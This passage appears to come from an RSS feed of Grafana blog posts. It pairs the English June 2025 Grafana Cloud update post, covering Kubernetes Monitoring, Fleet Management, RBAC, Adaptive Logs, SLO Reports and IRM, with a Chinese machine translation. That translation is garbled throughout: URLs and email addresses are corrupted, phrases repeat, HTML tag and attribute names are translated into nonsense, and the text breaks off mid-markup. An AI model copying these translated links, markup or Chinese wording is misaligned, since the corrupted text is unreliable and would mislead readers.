=“/oss/mimir/？pg = blog＆plcmt = body-txt”&gt; mimir &lt;/a&gt;用于指标），是基于“大帐篷”原则。我们还为Prometheus（我们是第一公司贡献者）和OpenTelemetry等OSS项目做出了贡献，重点是使&#xA;&lt;a href =“/blog/2024/11/06/prometheus-3.0 and-opentelemetry-a practical-guide-guide-to-guide-to-to-querying-otel-otel-data/“”&gt;两个项目更可互操作&lt;/a&gt;。&lt;/p&gt;&#xA;&lt;p&gt;这是我们目前对“大帐篷”和互操作性的思考，但我们希望继续倾听我们的社区，合作伙伴和用户，以更好地完善我们的方法。请在&#xA;&lt;a href =“ mailto：intemprations@grafana.com”&gt; integrations@grafana.com &lt;/a&gt;如果您有任何反馈，问题或疑虑。&lt;/p&gt;&#xA;&lt;p&gt;我们还创建了&#xA;&lt;a href =“/docs/grafana-cloud/whats-new/2024-07-24-ROADMAP-for-new-data-sources/？pg = blog＆plcmt = body-txt = public-txt“&gt; public rougharoadmap”&gt;公共路线图&lt;/a&gt;显示了Grafana Labs（我们的伙伴）构建的所有日期源插件，我们的伙伴和我们的社区以及我们的社区以及我们的社区。 Grafana Cloud用户现在可以查看我们当前的计划，并请求新的插件，upvote现有请求或对想法和要求发表评论。&lt;/p&gt;&#xA;&lt;p&gt;无论您如何与我们的社区互动，我们都希望收到您的来信，并了解如何使Grafana的“大帐篷”更大，更好。&lt;/p&gt;</description>
      <pubDate>Mon, 16 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【Grafana Cloud updates: The latest features in Kubernetes Monitoring, Fleet Management, and more】Grafana云更新：Kubernetes监视，车队管理等的最新功能</title>
      <link>https://grafana.com/blog/2025/06/25/grafana-cloud-updates-the-latest-features-in-kubernetes-monitoring-fleet-management-and-more/</link>
      <description>【&lt;p&gt;We consistently roll out helpful updates and fun features in Grafana Cloud, our fully managed observability platform powered by the open source Grafana LGTM Stack (&#xA;&lt;a href=&#34;/oss/loki/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Loki&lt;/a&gt; for logs,&#xA;&lt;a href=&#34;/oss/grafana/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana&lt;/a&gt; for visualization,&#xA;&lt;a href=&#34;/oss/tempo/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Tempo&lt;/a&gt; for traces, and&#xA;&lt;a href=&#34;/oss/mimir/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Mimir&lt;/a&gt; for metrics).&lt;/p&gt;&#xA;&lt;p&gt;In case you missed them, here’s our monthly round-up of the latest and greatest Grafana Cloud updates. You can also read about all the features we add to Grafana Cloud in our&#xA;&lt;a href=&#34;/docs/grafana-cloud/whats-new/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;What’s New in Grafana Cloud documentation&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;And if you’re not a Grafana Cloud user yet,&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;sign up&lt;/a&gt; for an account today! You can try any of these features (and more) for free with our generous Cloud Free plan.&lt;/p&gt;&#xA;&lt;h2 id=&#34;deeper-insights-in-kubernetes-monitoring&#34;&gt;Deeper insights in Kubernetes Monitoring&lt;/h2&gt;&#xA;&lt;p&gt;Our&#xA;&lt;a href=&#34;/solutions/kubernetes/?pg=blog&amp;amp;plcmt=body-txt/&#34;&gt;Kubernetes Monitoring&lt;/a&gt; solution in Grafana Cloud enables you to visualize and alert on your Kubernetes cluster so you can identify root causes, optimize resource usage, and reduce costs. This month, we’ve added new features to streamline navigation and troubleshooting.&lt;/p&gt;&#xA;&lt;h3 id=&#34;quickly-find-logs-events-and-non-standard-workloads&#34;&gt;Quickly find logs, events, and non-standard workloads &lt;/h3&gt;&#xA;&lt;p&gt;From any detail page, click the &lt;strong&gt;Logs &amp;amp; Events&lt;/strong&gt; tab to easily find the logs and events for that particular Kubernetes object. You can filter for several dimensions, including:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Time period&lt;/li&gt;&#xA;&lt;li&gt;Component&lt;/li&gt;&#xA;&lt;li&gt;Cloud region&lt;/li&gt;&#xA;&lt;li&gt;Error level&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/docs/grafana-cloud/k8s/logs-table-cluster.png?w=1920&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/docs/grafana-cloud/k8s/logs-table-cluster.png?w=1920&#34;alt=&#34;A screenshot of a logs table for a Kubernetes cluster.&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/docs/grafana-cloud/k8s/logs-table-cluster.png?w=1920&#34;&#xA;alt=&#34;A screenshot of a logs table for a Kubernetes cluster.&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;Additionally, you can now use filters on the Workloads main page to quickly find&#xA;&lt;a href=&#34;/docs/grafana-cloud/monitor-infrastructure/kubernetes-monitoring/navigate-k8s-monitoring/#discover-non-standard-workloads&#34;&gt;non-standard workloads&lt;/a&gt;. Filters for these non-standard workloads include:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Argo Rollouts&lt;/li&gt;&#xA;&lt;li&gt;Strimzi Pod sets&lt;/li&gt;&#xA;&lt;li&gt;Unmanaged (or static) Pods&lt;/li&gt;&#xA;&lt;li&gt;CronJobs&lt;/li&gt;&#xA;&lt;li&gt;Bare Pods&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 670px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/docs/grafana-cloud/k8s/workload-type-sort.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/docs/grafana-cloud/k8s/workload-type-sort.png&#34;data-srcset=&#34;/media/docs/grafana-cloud/k8s/workload-type-sort.png?w=320 320w, /media/docs/grafana-cloud/k8s/workload-type-sort.png?w=550 550w, /media/docs/grafana-cloud/k8s/workload-type-sort.png?w=750 750w, /media/docs/grafana-cloud/k8s/workload-type-sort.png?w=900 900w, /media/docs/grafana-cloud/k8s/workload-type-sort.png?w=1040 1040w, /media/docs/grafana-cloud/k8s/workload-type-sort.png?w=1240 1240w, /media/docs/grafana-cloud/k8s/workload-type-sort.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of a filter for non-standard workloads.&#34;width=&#34;670&#34;height=&#34;802&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/docs/grafana-cloud/k8s/workload-type-sort.png&#34;&#xA;alt=&#34;A screenshot of a filter for non-standard workloads.&#34;width=&#34;670&#34;height=&#34;802&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h3 id=&#34;troubleshoot-faster-with-memory-and-cpu-tabs&#34;&gt;Troubleshoot faster with memory and CPU tabs &lt;/h3&gt;&#xA;&lt;p&gt;On any detail page in Kubernetes Monitoring, you can see an overview of CPU and memory usage. You can also now click the &lt;strong&gt;Memory&lt;/strong&gt; or &lt;strong&gt;CPU&lt;/strong&gt; &lt;strong&gt;tab&lt;/strong&gt; to view more correlated usage information. &lt;/p&gt;&#xA;&lt;p&gt;The Memory tab and its panels are accessible on any detail page beyond the container level. Now you can view memory usage alongside other relevant data points to understand, for example, which workloads contribute the most to the namespace’s memory usage.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/docs/grafana-cloud/k8s/workspace-memory-panels.png?w=1920&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/docs/grafana-cloud/k8s/workspace-memory-panels.png?w=1920&#34;alt=&#34;A screenshot of memory usage panels in Kubernetes Monitoring.&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/docs/grafana-cloud/k8s/workspace-memory-panels.png?w=1920&#34;&#xA;alt=&#34;A screenshot of memory usage panels in Kubernetes Monitoring.&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;The CPU tab, meanwhile, offers insightful panels on every detail page beyond the container page to enable faster troubleshooting and better resource planning. You can gain deeper visibility, from cluster to pod, with utilization efficiency graphs and CPU distribution analysis.&lt;/p&gt;&#xA;&lt;p&gt;For example, you can use the CPU tab to gain capacity-sizing insights to optimize performance.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 2074px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/docs/grafana-cloud/k8s/cputab.gif&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/docs/grafana-cloud/k8s/cputab.gif&#34;alt=&#34;A GIF showing the CPU tab.&#34;width=&#34;2074&#34;height=&#34;1656&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/docs/grafana-cloud/k8s/cputab.gif&#34;&#xA;alt=&#34;A GIF showing the CPU tab.&#34;width=&#34;2074&#34;height=&#34;1656&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;You can learn more about the CPU and memory tabs in our&#xA;&lt;a href=&#34;/docs/grafana-cloud/monitor-infrastructure/kubernetes-monitoring/navigate-k8s-monitoring/?pg=blog&amp;amp;plcmt=body-txt/#cpu-and-memory-tabs&#34;&gt;Kubernetes Monitoring documentation&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;h2 id=&#34;new-features-in-grafana-fleet-management&#34;&gt;New features in Grafana Fleet Management &lt;/h2&gt;&#xA;&lt;p&gt;In&#xA;&lt;a href=&#34;/docs/grafana-cloud/send-data/fleet-management/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Fleet Management&lt;/a&gt;, a Grafana Cloud solution that enables you to manage collector deployments at scale, we’ve rolled out a couple new features related to restoring and reusing pipelines.&lt;/p&gt;&#xA;&lt;h3 id=&#34;restore-pipeline-versions&#34;&gt;Restore pipeline versions &lt;/h3&gt;&#xA;&lt;p&gt;The&#xA;&lt;a href=&#34;/docs/grafana-cloud/send-data/fleet-management/manage-fleet/pipelines/view-pipeline-history/&#34;&gt;pipeline history&lt;/a&gt; feature in Fleet Management now provides an option to restore versions of existing configuration pipelines. From the &lt;strong&gt;History details&lt;/strong&gt; page, choose a version and click &lt;strong&gt;Restore&lt;/strong&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Here’s how it works:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Restoring a pipeline version overwrites the configuration of the current pipeline.&lt;/li&gt;&#xA;&lt;li&gt;A restored pipeline is set to the same Active or Inactive state as the pipeline it overwrites.&lt;/li&gt;&#xA;&lt;li&gt;When a pipeline version is restored, its matching attributes can also be restored, or the matching attributes from the overwritten pipeline can be persisted in the restored version.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1999px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png&#34;data-srcset=&#34;/media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=320 320w, /media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=550 550w, /media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=750 750w, /media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=900 900w, /media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=1040 1040w, /media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=1240 1240w, /media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of the restore pipelines feature in Fleet Management.&#34;width=&#34;1999&#34;height=&#34;1087&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/grafana-cloud-updates-june-2025/restore-pipelines-fleet-management.png&#34;&#xA;alt=&#34;A screenshot of the restore pipelines feature in Fleet Management.&#34;width=&#34;1999&#34;height=&#34;1087&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h3 id=&#34;reusable-pipeline-components&#34;&gt;Reusable pipeline components &lt;/h3&gt;&#xA;&lt;p&gt;Pipelines in Grafana Fleet Management can now leverage the&#xA;&lt;a href=&#34;/oss/alloy-opentelemetry-collector/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Alloy&lt;/a&gt; &lt;code&gt;export&lt;/code&gt; block to share their components with other pipelines. &lt;/p&gt;&#xA;&lt;p&gt;With&#xA;&lt;a href=&#34;/docs/grafana-cloud/send-data/fleet-management/set-up/configuration-pipelines/pipeline-export-injection/&#34;&gt;pipeline export injection&lt;/a&gt;, you can export components from one configuration pipeline and inject them into another using the syntax &lt;code&gt;argument.pipeline_exports.value[&amp;quot;PIPELINE_NAME&amp;quot;][&amp;quot;EXPORT_NAME&amp;quot;]&lt;/code&gt;. This powerful feature enables you to create dynamic configurations that adapt to each pipeline’s exported values, allowing for flexible and reusable pipeline configurations.&lt;/p&gt;&#xA;&lt;p&gt;You can learn more in our&#xA;&lt;a href=&#34;/docs/grafana-cloud/send-data/fleet-management/manage-fleet/pipelines/view-pipeline-history/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Fleet Management technical docs&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;h2 id=&#34;rbac-in-synthetic-monitoring&#34;&gt;RBAC in Synthetic Monitoring &lt;/h2&gt;&#xA;&lt;p&gt;Now generally available, RBAC within&#xA;&lt;a href=&#34;/products/cloud/synthetic-monitoring/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud Synthetic Monitoring&lt;/a&gt; allows you to fine-tune access and permissions, so you have greater control over who can access specific features. You can assign different roles and permissions to users and teams, ensuring the right people have the right access. &lt;/p&gt;&#xA;&lt;p&gt;This makes managing your monitoring workflows more secure and flexible.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/docs/synthetic-monitoring/rbac1.png?w=1240&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/docs/synthetic-monitoring/rbac1.png?w=1240&#34;alt=&#34;A screenshot of RBAC configurations in Synthetic Monitoring.&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/docs/synthetic-monitoring/rbac1.png?w=1240&#34;&#xA;alt=&#34;A screenshot of RBAC configurations in Synthetic Monitoring.&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;To learn more about how to assign roles in Synthetic Monitoring, please check out our&#xA;&lt;a href=&#34;/docs/grafana/latest/administration/roles-and-permissions/access-control/assign-rbac-roles/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;documentation&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;h2 id=&#34;early-detection-patterns-for-adaptive-logs&#34;&gt;Early detection patterns for Adaptive Logs&lt;/h2&gt;&#xA;&lt;p&gt;&#xA;&lt;a href=&#34;/docs/grafana-cloud/cost-management-and-billing/adaptive-telemetry/adaptive-logs//?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Adaptive Logs&lt;/a&gt; is a Grafana Cloud feature that uses AI/ML techniques to analyze observability data at scale and identify commonly ingested log patterns. From there, it creates customized recommendations for dropping unused telemetry, allowing you to reduce observability costs and focus on the signals that truly matter.&lt;/p&gt;&#xA;&lt;p&gt;This month, we rolled out a new feature in Adaptive Logs that lets you filter for early detection patterns, so you can identify and remove ingest spikes quickly. Now generally available, this early-detection tool allows you to proactively ensure only the most valuable telemetry is shipped to Grafana Cloud.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/adaptive-metrics/Screenshot-2025-05-27-at-12.16.51%e2%80%afPM.png?w=1920&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/adaptive-metrics/Screenshot-2025-05-27-at-12.16.51%e2%80%afPM.png?w=1920&#34;alt=&#34;A screenshot of the early detection patterns feature in Adaptive Logs.&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/adaptive-metrics/Screenshot-2025-05-27-at-12.16.51%e2%80%afPM.png?w=1920&#34;&#xA;alt=&#34;A screenshot of the early detection patterns feature in Adaptive Logs.&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;To view early detection patterns, use the &lt;strong&gt;Show early detection patterns&lt;/strong&gt; toggle. The toggle also shows you the number of early patterns available. You can learn more in our&#xA;&lt;a href=&#34;/docs/grafana-cloud/cost-management-and-billing/adaptive-telemetry/adaptive-logs/manage-recommendations/#view-early-detection-patterns&#34;&gt;Adaptive Logs docs&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;h2 id=&#34;grafana-slo-reports&#34;&gt;Grafana SLO Reports&lt;/h2&gt;&#xA;&lt;p&gt;&#xA;&lt;a href=&#34;/products/cloud/slo/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana SLO&lt;/a&gt; — an application that makes it easy to create, manage, and scale service level objectives, SLO dashboards, and error budget alerts in Grafana Cloud — includes a powerful new feature to report on multiple SLOs on a weekly or monthly basis. &lt;/p&gt;&#xA;&lt;p&gt;You can use these new SLO Reports to:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Consolidate multiple SLOs into a single, easy-to-digest report&lt;/li&gt;&#xA;&lt;li&gt;View individual and combined SLI (Service Level Indicator) metrics&lt;/li&gt;&#xA;&lt;li&gt;Understand weighted contributions of each SLO to the overall SLI performance&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;SLO Reports make it easier to monitor trends over time, share insights with stakeholders, and prioritize reliability efforts across high-impact services.&lt;/p&gt;&#xA;&lt;p&gt;To read more, and create your report today, please check out our&#xA;&lt;a href=&#34;/docs/grafana-cloud/alerting-and-irm/slo/reports/&#34;&gt;technical docs&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;h2 id=&#34;syncing-contacts-in-grafana-irm-mobile-app&#34;&gt;Syncing contacts in Grafana IRM mobile app&lt;/h2&gt;&#xA;&lt;p&gt;With the&#xA;&lt;a href=&#34;/docs/grafana-cloud/alerting-and-irm/irm/use/irm-mobile-app/&#34;&gt;Grafana IRM mobile app&lt;/a&gt;, you can sync the phone numbers used by Grafana IRM to your mobile device’s contacts. This makes it easier to recognize IRM calls and optionally allow them to override Do Not Disturb (DnD) or silent mode for urgent alerts.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 783px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png&#34;data-srcset=&#34;/media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=320 320w, /media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=550 550w, /media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=750 750w, /media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=900 900w, /media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=1040 1040w, /media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=1240 1240w, /media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;A screenshot of option to sync contacts in the Grafana IRM mobile app.&#34;width=&#34;783&#34;height=&#34;1600&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/docs/grafana-cloud/alerting-and-irm/screenshot-contact-sync.png&#34;&#xA;alt=&#34;A screenshot of option to sync contacts in the Grafana IRM mobile app.&#34;width=&#34;783&#34;height=&#34;1600&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;p&gt;You can learn more about this new feature in our&#xA;&lt;a href=&#34;/docs/grafana-cloud/alerting-and-irm/irm/manage/notifications/phone-and-sms/#sync-irm-phone-numbers-to-your-contacts&#34;&gt;technical docs&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;h2 id=&#34;streamlined-navigation-via-the-observability-menu&#34;&gt;Streamlined navigation via the Observability menu &lt;/h2&gt;&#xA;&lt;p&gt;We’ve updated the main navigation in Grafana Cloud to bring all observability tools together under a single menu called &lt;strong&gt;Observability&lt;/strong&gt;. You’ll now find&#xA;&lt;a href=&#34;/products/cloud/application-observability/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud Application Observability&lt;/a&gt;,&#xA;&lt;a href=&#34;/products/cloud/frontend-observability-for-real-user-monitoring/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Frontend Observability&lt;/a&gt;,&#xA;&lt;a href=&#34;/solutions/kubernetes/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Kubernetes Monitoring&lt;/a&gt;,&#xA;&lt;a href=&#34;/docs/grafana-cloud/monitor-infrastructure/monitor-cloud-provider/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Cloud Provider Observability&lt;/a&gt;, and more grouped in one place.&lt;/p&gt;&#xA;&lt;p&gt;This change is part of our effort to provide:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A simpler, more consistent experience across observability tools&lt;/li&gt;&#xA;&lt;li&gt;Faster access to relevant signals and workflows&lt;/li&gt;&#xA;&lt;li&gt;A foundation for deeper, context-aware troubleshooting&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Stay tuned — more improvements will follow soon.&lt;/p&gt;&#xA;&lt;h2 id=&#34;new-in-enterprise-data-sources-logicmonitor&#34;&gt;New in Enterprise data sources: LogicMonitor&lt;/h2&gt;&#xA;&lt;p&gt;The LogicMonitor Devices data source plugin enables you to query and visualize &lt;code&gt;Device Instance Data&lt;/code&gt;, and to list &lt;code&gt;Devices&lt;/code&gt;, &lt;code&gt;Datasources&lt;/code&gt;, and &lt;code&gt;Instances&lt;/code&gt;, directly within Grafana Cloud. &lt;/p&gt;&#xA;&lt;p&gt;Learn more about using and installing the LogicMonitor data source in our&#xA;&lt;a href=&#34;/docs/plugins/grafana-logicmonitor-datasource/latest/&#34;&gt;documentation&lt;/a&gt;. And to learn more about our Enterprise data sources, in general, please refer to&#xA;&lt;a href=&#34;/blog/2024/05/13/grafana-enterprise-data-source-plugins-a-brief-guide-to-what-they-are-and-how-to-get-started/&#34;&gt;this guide&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;&#xA;&lt;a href=&#34;/products/cloud/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud&lt;/a&gt; is the easiest way to get started with incident response and management. We have a generous forever-free tier and plans for every use case.&#xA;&lt;a href=&#34;/auth/sign-up/create-user?pg=blog&amp;amp;redirectPath=irm&#34;&gt;Sign up for free now&lt;/a&gt;!&lt;/em&gt;&lt;/p&gt;】&lt;p&gt;我们始终在Grafana Cloud中推出有用的更新和有趣的功能，Grafana Cloud是由开源Grafana LGTM堆栈提供支持的完全管理的可观察性平台（&#xA;&lt;a href =“/oss/loki/？pg = blog＆plcmt = body-txt”&gt; loki &lt;/a&gt;用于日志，&#xA;&lt;a href =“/oss/grafana/？pg = blog＆plcmt = body-txt”&gt; grafana &lt;/a&gt;用于可视化，&#xA;&lt;a href =“/oss/tempo/？pg = blog＆plcmt = body-txt”&gt; tempo &lt;/a&gt;用于痕迹，并且&#xA;&lt;a href =“/oss/mimir/？pg = blog＆plcmt = body-txt”&gt; mimir &lt;/a&gt;用于指标）。&lt;/p&gt;&#xA;&lt;p&gt;如果您错过了他们，这是我们每月对最新，最出色的Grafana Cloud更新的综述。您还可以阅读有关我们在我们的Grafana Cloud中添加的所有功能&#xA;&lt;a href =“/docs/grafana-cloud/whats-new/？pg = blog＆plcmt = body-txt”&gt; grafana云文档中有什么新功能&lt;/a&gt;。&lt;/p&gt;&#xA;&lt;p&gt;，如果您还不是Grafana Cloud用户，&#xA;&lt;a href =“/auth/ige-up/create-user/？pg = blog＆plcmt = body-txt”&gt;签署&lt;/a&gt;今天的帐户！您可以通过我们慷慨的无云计划免费尝试任何这些功能（以及更多）。&lt;/p&gt;&#xA;&lt;h2 id =“更深入的象征”&gt; kubernetes监视中的更深入见解&lt;/h2&gt;&#xA;&lt;p&gt;我们的&#xA;&lt;a href =“/solutions/kubernetes/？pg = blog＆plcmt = body-txt/“&gt; kubernetes监视&lt;/a&gt; grafana cloud中的解决方案使您能够在Kubernetes群集上可视化和警报，以便您可以识别根本原因，以确定根本原因，优化资源使用，并降低成本，并降低成本。本月，我们为简化导航和故障排除添加了新功能。&lt;/p&gt;&#xA;在&#xA;&lt;p&gt;从任何详细信息页面中，单击&lt;strong&gt;日志和事件&lt;/strong&gt;选项卡，以轻松找到该特定kubernetes对象的日志和事件。您可以过滤几个维度，包括：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;时间段&lt;/li&gt;&#xA;&lt;li&gt;组件&lt;/li&gt;&#xA;&lt;li&gt;云区域&lt;/li&gt;&#xA;&lt;li&gt;错误级别&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;style =“最大宽度：px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ 